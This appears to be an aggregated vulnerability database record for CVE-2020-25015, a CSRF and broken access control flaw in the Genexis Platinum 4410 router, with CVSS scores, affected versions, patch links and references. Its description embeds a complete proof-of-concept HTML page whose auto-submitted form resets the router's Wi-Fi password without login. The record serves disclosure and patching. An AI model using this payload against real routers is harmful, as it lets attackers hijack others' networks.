ID

VAR-202009-0727


CVE

CVE-2020-25015


TITLE

Genexis Platinum cross-site request forgery vulnerability

Trust: 1.2

sources: CNVD: CNVD-2020-56086 // CNNVD: CNNVD-202009-1006

DESCRIPTION

A specific router allows changing the Wi-Fi password remotely. Genexis Platinum 4410 V2-1.28, a compact router generally used at homes and offices was found to be vulnerable to Broken Access Control and CSRF which could be combined to remotely change the WIFI access point’s password. Genexis Platinum 4410 Contains a cross-site request forgery vulnerability.Information may be tampered with. Genexis Platinum 4410 is a router of genexis. An attacker can use this vulnerability to send unexpected requests to the server through the affected client. # Exploit Title: Genexis Platinum-4410 P4410-V2-1.28 - Broken Access Control and CSRF # Date: 28-08-2020 # Vendor Homepage: https://www.gxgroup.eu/ont-products/ # Exploit Author: Jinson Varghese Behanan (@JinsonCyberSec) # Author Advisory: https://www.getastra.com/blog/911/csrf-broken-access-control-in-genexis-platinum-4410/ # Version: v2.1 (software version P4410-V2-1.28) # CVE : CVE-2020-25015 1. 2. 3. Proof of Concept Create an HTML file with the following code: <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://192.168.1.1/cgi-bin/net-wlan.asp" method="POST"> <input type="hidden" name="wlEnbl" value="ON" /> <input type="hidden" name="hwlKeys0" value="" /> <input type="hidden" name="hwlKeys1" value="" /> <input type="hidden" name="hwlKeys2" value="" /> <input type="hidden" name="hwlKeys3" value="" /> <input type="hidden" name="hwlgMode" value="9" /> <input type="hidden" name="hwlAuthMode" value="WPAPSKWPA2PSK" /> <input type="hidden" name="hwlEnbl" value="1" /> <input type="hidden" name="hWPSMode" value="1" /> <input type="hidden" name="henableSsid" value="1" /> <input type="hidden" name="hwlHide" value="0" /> <input type="hidden" name="isInWPSing" value="0" /> <input type="hidden" name="WpsConfModeAll" value="7" /> <input type="hidden" name="WpsConfModeNone" value="0" /> <input type="hidden" name="hWpsStart" value="0" /> <input type="hidden" name="isCUCSupport" value="0" /> <input type="hidden" name="SSIDPre" value="N&#47;A" /> <input type="hidden" name="bwControlhidden" value="0" /> <input type="hidden" name="ht&#95;bw" value="1" /> <input type="hidden" name="wlgMode" value="b&#44;g&#44;n" /> <input type="hidden" name="wlChannel" value="0" /> <input type="hidden" name="wlTxPwr" value="1" /> <input type="hidden" name="wlSsidIdx" value="0" /> <input type="hidden" name="SSID&#95;Flag" value="0" /> <input type="hidden" name="wlSsid" value="JINSON" /> <input type="hidden" name="wlMcs" value="33" /> <input type="hidden" name="bwControl" value="1" /> <input type="hidden" name="giControl" value="1" /> <input type="hidden" name="enableSsid" value="on" /> <input type="hidden" name="wlAssociateNum" value="32" /> <input type="hidden" name="wlSecurMode" value="WPAand11i" /> <input type="hidden" name="wlPreauth" value="off" /> <input type="hidden" name="wlNetReauth" value="1" /> <input type="hidden" name="wlWpaPsk" value="NEWPASSWORD" /> <input type="hidden" name="cb&#95;enablshowpsw" value="on" /> <input type="hidden" name="wlWpaGtkRekey" value="" /> <input type="hidden" name="wlRadiusIPAddr" value="" /> <input type="hidden" name="wlRadiusPort" value="" /> <input type="hidden" name="wlRadiusKey" value="" /> <input type="hidden" name="wlWpa" value="TKIPAES" /> <input type="hidden" name="wlKeyBit" value="64" /> <input type="hidden" name="wlKeys" value="" /> <input type="hidden" name="wlKeys" value="" /> <input type="hidden" name="wlKeys" value="" /> <input type="hidden" name="wlKeys" value="" /> <input type="hidden" name="WpsActive" value="0" /> <input type="hidden" name="wpsmode" value="ap&#45;pbc" /> <input type="hidden" name="pinvalue" value="" /> <input type="hidden" name="Save&#95;Flag" value="1" /> <input type="submit" value="Submit request" /> </form> <script> document.forms[0].submit(); </script> </body> </html> Open this file in a browser while you are connected to the WIFI. There is no need for the victim to be logged in to the Router admin panel (192.168.1.1). It can be seen that the WIFI connection is dropped. To reconnect, forget the WIFI connection on your laptop or phone and connect using the newly changed password: NEWPASSWORD 4. PoC Video: https://www.youtube.com/watch?v=nSu5ANDH2Rk&feature=emb_title 3. Timeline Vulnerability reported to the Genexis team – August 28, 2020 Team confirmed firmware release containing fix – September 14, 2020

Trust: 2.25

sources: NVD: CVE-2020-25015 // JVNDB: JVNDB-2020-011232 // CNVD: CNVD-2020-56086 // PACKETSTORM: 159936

IOT TAXONOMY

category:['Network device']sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2020-56086

AFFECTED PRODUCTS

vendor:genexismodel:platinum 4410scope:eqversion:p4410-v2-1.28

Trust: 1.0

vendor:genexismodel:platinum-4410scope:eqversion: -

Trust: 0.8

vendor:genexismodel:platinum-4410scope:eqversion:genexis platinum-4410 firmware 2-1.28

Trust: 0.8

vendor:genexismodel:platinumscope:eqversion:4410v2-1.28

Trust: 0.6

sources: CNVD: CNVD-2020-56086 // JVNDB: JVNDB-2020-011232 // NVD: CVE-2020-25015

CVSS

SEVERITY

CVSSV2

CVSSV3

NVD: CVE-2020-25015
value: MEDIUM

Trust: 1.8

CNVD: CNVD-2020-56086
value: MEDIUM

Trust: 0.6

CNNVD: CNNVD-202009-1006
value: MEDIUM

Trust: 0.6

NVD: CVE-2020-25015
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: FALSE
obtainAllPrivilege: FALSE
obtainUserPrivilege: FALSE
obtainOtherPrivilege: FALSE
userInteractionRequired: TRUE
version: 2.0

Trust: 1.8

CNVD: CNVD-2020-56086
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

NVD: CVE-2020-25015
baseSeverity: MEDIUM
baseScore: 6.5
vectorString: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: REQUIRED
scope: UNCHANGED
confidentialityImpact: NONE
integrityImpact: HIGH
availabilityImpact: NONE
exploitabilityScore: 2.8
impactScore: 3.6
version: 3.1

Trust: 1.0

NVD: CVE-2020-25015
baseSeverity: MEDIUM
baseScore: 6.5
vectorString: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: REQUIRED
scope: UNCHANGED
confidentialityImpact: NONE
integrityImpact: HIGH
availabilityImpact: NONE
exploitabilityScore: NONE
impactScore: NONE
version: 3.0

Trust: 0.8

sources: CNVD: CNVD-2020-56086 // JVNDB: JVNDB-2020-011232 // CNNVD: CNNVD-202009-1006 // NVD: CVE-2020-25015

PROBLEMTYPE DATA

problemtype:CWE-352

Trust: 1.0

problemtype:Cross-site request forgery (CWE-352) [NVD Evaluation ]

Trust: 0.8

sources: JVNDB: JVNDB-2020-011232 // NVD: CVE-2020-25015

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-202009-1006

TYPE

cross-site request forgery

Trust: 0.6

sources: CNNVD: CNNVD-202009-1006

CONFIGURATIONS

sources: NVD: CVE-2020-25015

PATCH

title:Top Pageurl:https://www.gxgroup.eu/

Trust: 0.8

title:Patch for Genexis Platinum cross-site request forgery vulnerabilityurl:https://www.cnvd.org.cn/patchinfo/show/236092

Trust: 0.6

title:Genexis Platinum Fixes for cross-site request forgery vulnerabilitiesurl:http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=128996

Trust: 0.6

sources: CNVD: CNVD-2020-56086 // JVNDB: JVNDB-2020-011232 // CNNVD: CNNVD-202009-1006

EXTERNAL IDS

db:NVDid:CVE-2020-25015

Trust: 3.1

db:PACKETSTORMid:159936

Trust: 2.5

db:JVNDBid:JVNDB-2020-011232

Trust: 0.8

db:CNVDid:CNVD-2020-56086

Trust: 0.6

db:EXPLOIT-DBid:49000

Trust: 0.6

db:CNNVDid:CNNVD-202009-1006

Trust: 0.6

sources: CNVD: CNVD-2020-56086 // JVNDB: JVNDB-2020-011232 // PACKETSTORM: 159936 // CNNVD: CNNVD-202009-1006 // NVD: CVE-2020-25015

REFERENCES

url:http://packetstormsecurity.com/files/159936/genexis-platinum-4410-p4410-v2-1.28-missing-access-control-csrf.html

Trust: 3.0

url:https://www.getastra.com/blog/911/csrf-broken-access-control-in-genexis-platinum-4410/

Trust: 2.5

url:https://nvd.nist.gov/vuln/detail/cve-2020-25015

Trust: 2.1

url:https://www.jinsonvarghese.com/broken-access-control-csrf-in-genexis-platinum-4410/

Trust: 1.6

url:https://www.exploit-db.com/exploits/49000

Trust: 0.6

url:https://www.gxgroup.eu/ont-products/

Trust: 0.1

url:https://www.youtube.com/watch?v=nsu5andh2rk&feature=emb_title

Trust: 0.1

url:http://192.168.1.1/cgi-bin/net-wlan.asp"

Trust: 0.1

sources: CNVD: CNVD-2020-56086 // JVNDB: JVNDB-2020-011232 // PACKETSTORM: 159936 // CNNVD: CNNVD-202009-1006 // NVD: CVE-2020-25015

CREDITS

Jinson Varghese Behanan

Trust: 0.7

sources: PACKETSTORM: 159936 // CNNVD: CNNVD-202009-1006

SOURCES

db:CNVDid:CNVD-2020-56086
db:JVNDBid:JVNDB-2020-011232
db:PACKETSTORMid:159936
db:CNNVDid:CNNVD-202009-1006
db:NVDid:CVE-2020-25015

LAST UPDATE DATE

2022-11-17T22:33:21.264000+00:00


SOURCES UPDATE DATE

db:CNVDid:CNVD-2020-56086date:2020-10-14T00:00:00
db:JVNDBid:JVNDB-2020-011232date:2021-03-24T06:57:00
db:CNNVDid:CNNVD-202009-1006date:2020-11-10T00:00:00
db:NVDid:CVE-2020-25015date:2022-11-16T14:14:00

SOURCES RELEASE DATE

db:CNVDid:CNVD-2020-56086date:2020-10-13T00:00:00
db:JVNDBid:JVNDB-2020-011232date:2021-03-24T00:00:00
db:PACKETSTORMid:159936date:2020-11-09T17:26:50
db:CNNVDid:CNNVD-202009-1006date:2020-09-16T00:00:00
db:NVDid:CVE-2020-25015date:2020-09-16T18:15:00